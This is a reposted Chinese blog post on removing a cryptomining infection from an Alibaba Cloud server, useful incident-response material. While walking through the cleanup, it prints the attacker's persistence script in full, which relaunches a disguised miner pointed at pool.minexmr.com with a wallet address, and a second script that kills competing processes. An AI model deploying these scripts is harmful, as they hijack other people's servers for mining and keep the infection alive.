博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
阿里云服务器出现入侵事件:挖矿进程
阅读量:4975 次
发布时间:2019-06-12

本文共 2033 字,大约阅读时间需要 6 分钟。

1.查看进程

# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'
找出CPU占有率高的你不认识的进程,我的是这样的

bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa

干掉它

kill -9 11110

2.全局搜索这个进程

[root@wangtianze ~]# grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:cat daemon | grep pool.minexmr.com
.bash_history:cat deamon | grep pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com
.bash_history:grep -r pool.minexmr.com

3.打开搜索到的位置

# vim /boot/grub/deamon

里面是这样的

#!/bin/bash

#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`
if [ ! "$server" ]; then
\cp -rf /boot/grub/grub.tz /usr/sbin/bashd
chmod +x /usr/sbin/bashd
cd /usr/sbin
nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
fi
sleep 15
done
删掉里面的while循环,只保留

#!/bin/bash

#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
全局搜索

# grep -r pool.minexmr.com

同样干掉

#!/bin/bash

#disk_genius
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
ps aux --sort=%cpu |grep -v 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | awk '{if($3 > 40.0 && $NF ~//) print $2}' |xargs -i kill -9 {}
sleep 3
done
改成

#!/bin/bash

#disk_geniusi
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
再次搜索

# grep -r pool.minexmr.com

终于没了

首先找到是哪里的漏洞,设置特定IP访问

---------------------
作者:Wang_Tian_Ze
来源:CSDN
原文:https://blog.csdn.net/qq_16845639/article/details/77650271
版权声明:本文为博主原创文章,转载请附上博文链接!

 

转载于:https://www.cnblogs.com/nul1/p/10942193.html

你可能感兴趣的文章
laravel入门-CSRF解决
查看>>
数据库 chapter 17 数据仓库与联机分析处理技术
查看>>
Hdu4547CD操作离线lca
查看>>
jquery的基本事件大全
查看>>
git打tag
查看>>
Docker容器中安装vim
查看>>
前言:学习自动化之前需要知道的
查看>>
HTML5 - Canvas动画样例(谷歌弹跳球)
查看>>
Spring注解注入
查看>>
hdu 1045 Fire Net dfs深搜或者二分匹配
查看>>
sqlserver 时间转换
查看>>
多态、接口
查看>>
浅拷贝 深拷贝
查看>>
Linux系统部署samba服务记录
查看>>
bzoj 1068: [SCOI2007]压缩
查看>>
python检查是否是闰年
查看>>
15、vue项目封装axios并访问接口
查看>>
TopCoder SRM 570 题解
查看>>
oracle数据库中的异常处理
查看>>
oo第二次博客-三次电梯调度的总结与反思
查看>>